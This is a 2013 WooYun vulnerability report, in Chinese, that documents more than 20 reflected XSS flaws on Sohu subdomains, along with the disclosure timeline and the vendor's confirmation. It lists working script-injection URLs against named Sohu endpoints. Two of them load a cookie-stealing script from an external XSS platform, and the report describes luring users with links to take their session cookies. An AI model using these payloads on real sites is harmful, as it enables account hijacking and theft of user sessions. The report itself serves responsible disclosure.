当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033442

漏洞标题:sohu分站20多处反射性XSS

相关厂商:搜狐

漏洞作者: Spid3r

提交时间:2013-08-05 11:03

修复时间:2013-09-19 11:04

公开时间:2013-09-19 11:04

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-05: 细节已通知厂商并且等待厂商处理中
2013-08-05: 厂商已经确认,细节仅向厂商公开
2013-08-15: 细节向核心白帽子及相关领域专家公开
2013-08-25: 细节向普通白帽子公开
2013-09-04: 细节向实习白帽子公开
2013-09-19: 细节向公众公开

简要描述:

20多处反射XSS... 其实反射XSS危害还是蛮大的.作为大厂商来讲就更加是了.

详细说明:

1、顾名思义,我们得先找到存在XSS漏洞的地方对吧,大概看了下,20多个地方存在XSS

http://i.sohu.com/login/reg.do?bru="><script>alert('xss')</script>


http://store.tv.sohu.com/web/content.do?pid=5513916&productId=2341&spayid=300006?pvid="><script src=http://xsserme.sinaapp.com/3fJr2o?1375544283></script>


http://db.money.sohu.com/finxt/xtsearch.html?s.term="><script>alert('xss')</script>


http://db.money.sohu.com/finxt/xtsearch.html?s.income="><script>alert('xss')</script>


http://drug.health.sohu.com/Search/index?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


http://api.k.sohu.com/api/client/sendmsg.go?callback=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E;//


http://jiu.sohu.com/searchprice.php?f=1&t=99&cateid=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


http://jiu.sohu.com/searchprice.php?q=&cateid=1&flavor="><script>alert('xss')</script>


http://jiu.sohu.com/searchprice.php?q=&cateid=1&alcohol=&occasions="><script>alert('xss')</script>


http://search.auto.sohu.com/suggest.jhtml?func=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&kw=&t=


func kw2个参数都有

http://saa.auto.sohu.com/club/active-summary.shtml?status=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&type=1&province=-1


status type 2个参数都有

http://mailinglist.corp.sohu.com/inputMail.jsp?type=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


http://m.i.sohu.com/m/auth/login/?next=h%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


http://db.money.sohu.com/finxt/touser.html?u.productName=%D6%DA%D2%E61322%C6%DA%28TOT%29&u.position=1001301001&u.productCode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


3个参数都有.

http://cfg.mini.sohu.com/setcookie.php?var=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


2、ok,现在我们找其中一例把代码换位盗取cookies的代码。

http://i.sohu.com/login/reg.do?bru="><script src=http://xsserme.sinaapp.com/3fJr2o?1375544283></script>


这里我就随便找了个XSS平台来演示下。然后可以去论坛发消息,各种消息,同样也可以私信给别人,我这里找的是一位朋友来帮忙测试的.
3、成功盗取COOKIES

souhu.jpg


有了cookies后面就不用说了吧。。。。很多厂商都不注重反射性XSS。。其实反射性XSS也是可以利用的,当然这可能受害最大的只是用户。但如果工作人员安全意识不是那么强的话,一样可以盲打的。。。。

漏洞证明:

以上XSS code 自行测试.这里只发2张图.

13.jpg


souhu.jpg

修复方案:

过滤.. 要是有公仔就更好了.

版权声明:转载请注明来源 Spid3r@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-08-05 12:31

厂商回复:

感谢支持。^_^

最新状态:

暂无


漏洞评价:

评论